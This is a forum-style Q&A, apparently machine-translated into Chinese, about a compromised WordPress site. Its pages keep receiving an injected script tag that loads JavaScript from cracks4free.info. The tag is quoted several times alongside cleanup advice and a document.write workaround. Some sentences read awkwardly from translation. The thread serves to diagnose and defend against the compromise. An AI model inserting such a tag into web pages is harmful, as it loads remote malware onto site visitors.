我使用的是WordPress站点,我发现了一个恶意脚本,每当我尝试保存网页和所见即所得点击文本面板,JavaScript是自动添加到页面中的恶意软件。 这里是自动添加脚本。
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
我试图通过下面的代码删除SRC文件。 但它没有工作,该脚本body标签闭幕前最后执行。 我尝试使用这个脚本,但恶意软件的脚本加载后所有的JavaScript加载。 这里是我的代码。
<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script>
我需要删除该代码,或阻止这种代码通过javasript,jQuery的AJAX任何执行..只是想摆脱这一点。 谢谢
如果您的服务器被入侵,你需要重建它:
尝试使用JavaScript来清理的内容不是一个解决方案。 你有一个妥协的WordPress安装和其他一些脚本天使特警增加了自己的个人风格之前,或者更糟糕的事情发生了这是一个时间的问题。
好像你的WordPress插件之一是vulernable到XSS (跨站脚本),我建议你扫描网络为这个插件的漏洞。 您可以扫描你的插件自己的源代码的东西,盲目地向用户发送回来的javascript不正确转义它。
您应该按照哈米什的意见,我的建议是只包括在这里,这样你就不会重新安装违规插件。
你可以注入一个新的脚本您的恶意脚本通过JavaScript执行权之前的开头:
document.write("<script type='application/x-suppress'>");
基本上现在你在这里开始新<script>块,但没有完成它,假设发生在非常接下来的事情就是恶意软件插入它的块在最后
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
最终的结果将最终会被
<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
会发生什么是浏览器将看到第一个<script>标记,并期望在心里它是JavaScript代码。 当它试图解析脚本( <script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">会造成的JavaScript解析错误,没有做任何事情。 在最后,你的<script>块经由关闭</script>通过您的恶意软件提供。
真正的问题是,为什么你有这样的恶意软件以及怎样才能摆脱它? 而不是试图去解决它。
